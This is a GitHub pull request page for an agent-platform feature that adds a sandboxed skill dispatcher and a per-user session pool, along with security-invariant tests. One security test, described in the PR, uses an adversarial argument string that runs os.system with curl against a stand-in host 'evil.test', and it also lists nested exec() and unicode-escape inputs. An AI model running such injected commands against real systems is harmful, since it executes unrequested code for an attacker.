feat(agentcore-strands): U4 unified skill dispatcher + session pool (SI-2/3/6)#510
Merged
Merged
Conversation
…SI-2/3/6) Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer. ## What lands ### `container-sources/skill_session_pool.py` Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API: - `acquire(key) -> SessionHandle` (warm reuse or fresh start) - `handle.release()` - `flush_for_tenant(tenant_id)` — U12 kill-switch path - `flush_all()` — ops escape hatch - `prune_idle()` — caller decides cadence; exposed so tests advance time ### `container-sources/skill_dispatcher.py` `dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced: - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source. - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session. - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded). - Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream. SI-3 (user-scoped pool key) is enforced structurally in the pool itself. ### `test_skill_session_pool.py` — 9 cases Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all. ### `test_skill_dispatcher.py` — 9 cases Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure. ### `test_skill_dispatcher_security.py` — 6 cases Each named with its SI number so grep surfaces coverage at review time: - SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string. - SI-2: exec template byte-identical across two invocations with different args — a structural assertion that fails if anyone ever reintroduces interpolation. - SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates. - SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug. ### Wiring - `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed. - `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers. ## What this does NOT do - Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool). - Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires — extracting now would add a seam with no caller yet. - Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness. ## Test plan - [x] `uv run ... pytest` on the three new files — 24 tests green - [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green (24 new + 187 existing) - [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests) - [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts` — 9 tests green - [x] ruff import-sort clean on every new file - [x] prettier clean on every touched TS file Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This was referenced Apr 24, 2026
ericodom
added a commit
that referenced
this pull request
May 5, 2026
…SI-2/3/6) (#510) Lands the single code path every skill-with-scripts invocation will flow through once U5 wires the Skill meta-tool (plan #7 §U4). Ships as inert today — the Dockerfile COPY picks it up (via U2a's wildcard) and _boot_assert registers it, but no production path calls it yet. Shadow-dispatch in U7 is the first consumer. ## What lands ### `container-sources/skill_session_pool.py` Async pool keyed on `(tenant_id, user_id, environment)`. LRU cap 8 per key, 30-min idle timeout, per-key async lock so concurrent acquires on the same key don't double-start a session. API: - `acquire(key) -> SessionHandle` (warm reuse or fresh start) - `handle.release()` - `flush_for_tenant(tenant_id)` — U12 kill-switch path - `flush_all()` — ops escape hatch - `prune_idle()` — caller decides cadence; exposed so tests advance time ### `container-sources/skill_dispatcher.py` `dispatch_skill_script(tenant_id, user_id, skill_slug, args, environment, *, pool, catalog, runner, counters)`. Security invariants enforced: - **SI-2** args travel via `writeFiles(_args.json=json.dumps(args))`; the executeCode string is a fixed template that opens the file and calls `run(**args)`. Model-controlled values never touch the Python source. - **SI-6** template purges `scripts.<slug>.*` from `sys.modules` + `importlib.invalidate_caches()` before every import, so a monkey-patch from call N cannot leak into call N+1 on the same pooled session. - Depth cap 5 (SkillDepthExceeded), per-turn budget 50 (SkillTurnBudgetExceeded). - Stdout parsed as JSON; structured errors (SkillOutputParseError, SkillTimeout, SkillExecutionError, SkillNotFound) all ride the same `DispatchResult` shape for uniform audit downstream. SI-3 (user-scoped pool key) is enforced structurally in the pool itself. ### `test_skill_session_pool.py` — 9 cases Acquire + reuse, concurrent-acquire safety, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant isolation, flush-all. ### `test_skill_dispatcher.py` — 9 cases Happy path (args land in `_args.json`, not in exec string), unknown slug, non-JSON stdout, timeout, non-zero exit with stderr, depth-cap boundary (max OK, max+1 rejected), turn budget, audit hook firing on ok + failure. ### `test_skill_dispatcher_security.py` — 6 cases Each named with its SI number so grep surfaces coverage at review time: - SI-2: adversarial args (`__import__('os').system('curl evil.test')`, nested `exec()`, unicode escapes) round-trip through _args.json unchanged, never appear in the exec string. - SI-2: exec template byte-identical across two invocations with different args — a structural assertion that fails if anyone ever reintroduces interpolation. - SI-3: alice and bob on the same tenant get distinct pool sessions; flush-for-tenant isolates. - SI-6: exec template purges `scripts.<slug>.*` before import, even on back-to-back calls with the same slug. ### Wiring - `_boot_assert.EXPECTED_CONTAINER_SOURCES` grows skill_dispatcher + skill_session_pool so the Dockerfile RUN asserts they landed. - `packages/api/src/lib/sandbox-preflight.ts` gains an optional `caller: 'execute_code' | 'skill_dispatch'` field on the input + result. Defaults to `execute_code` for backwards compat; dispatcher paths set `skill_dispatch` when U5+ wires them. No behavior change for existing callers. ## What this does NOT do - Does NOT wire the dispatcher into server.py's Agent(tools=...) flow. That's U5 (Skill meta-tool). - Does NOT extract the quota/audit loop from server.py:682-755. The plan calls for this as part of U4; deferring to the shadow-dispatch wiring in U7 where the quota call actually fires — extracting now would add a seam with no caller yet. - Does NOT call the real AgentCore Code Interpreter. Tests drive injected runner/pool callables. Real integration happens in U7's shadow-dispatch harness. ## Test plan - [x] `uv run ... pytest` on the three new files — 24 tests green - [x] Full `pytest packages/agentcore-strands/agent-container/` — 211 green (24 new + 187 existing) - [x] `pnpm --filter @thinkwork/api typecheck` green (preflight caller field threaded through existing tests) - [x] `pnpm --filter @thinkwork/api test` on `sandbox-preflight.test.ts` — 9 tests green - [x] ruff import-sort clean on every new file - [x] prettier clean on every touched TS file Part of the V1 agent-architecture plan (`docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md` §U4). Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Lands the single code path that every skill-with-scripts invocation will flow through once the Skill meta-tool (U5) wires it in. Today it ships as inert code — the Dockerfile COPY picks it up (via U2a's wildcard) and
_boot_assertregisters it, but no production path calls it yet. Shadow dispatch in U7 is the first consumer.Part of the V1 agent-architecture plan (
docs/plans/2026-04-23-007-feat-v1-agent-architecture-final-call-plan.md§U4).Why this is low-risk to land now
skill_dispatcher;run_skill_dispatch.pystill serves every live composition.start_session/stop_session, dispatcher'srunner). No boto3 in the hot path — AgentCore contact only happens when U7 wires the real runner.sys.modulespurge before import" — part of the exec template. Breaking any would show up as a test failure before it showed up as a CVE.The three security invariants
writeFiles([{path:"_args.json", text:json.dumps(args)}])+ fixed exec template that reads the file. Adversarial args (__import__('os').system(...), nestedexec(), unicode) round-trip unchanged through_args.jsonand never appear in the exec source. Regression test asserts exec string is byte-identical across two invocations with different args.SkillSessionPoolkeys on(tenant_id, user_id, environment).test_si3_users_on_same_tenant_get_distinct_sessionsproves alice and bob can't share a warm session.flush_for_tenantisolates across tenants.sys.modules['scripts.<slug>.*']+importlib.invalidate_caches()beforefrom scripts.<slug>.entrypoint import run. A monkey-patch from call N cannot leak into call N+1 on the same pooled session.Test counts
test_skill_session_pool.py— 9 cases (acquire/reuse, concurrency, LRU eviction of idle slots, in-use-never-evicted, idle pruning with frozen time, flush-for-tenant, flush-all)test_skill_dispatcher.py— 9 cases (happy path, unknown slug, non-JSON stdout, timeout, non-zero exit, depth-cap boundary, turn budget, audit hook)test_skill_dispatcher_security.py— 6 cases, each named with its SI number sogrep test_sisurfaces coverage at review timesandbox-preflight.test.ts: 9 greenWhat this PR does NOT do
server.py'sAgent(tools=...)flow. That's U5.server.py:682-755. Deferred to U7 where quota actually fires — extracting now would add a seam with no caller.Wiring
_boot_assert.EXPECTED_CONTAINER_SOURCESgrowsskill_dispatcher+skill_session_poolso the Dockerfile RUN asserts they landed.packages/api/src/lib/sandbox-preflight.tsgains an optionalcaller: 'execute_code' | 'skill_dispatch'field on input + result. Defaults toexecute_codefor backwards compat.Test plan
pnpm --filter @thinkwork/api typecheckgreenpnpm --filter @thinkwork/api testonsandbox-preflight.test.ts— 9 green🤖 Generated with Claude Code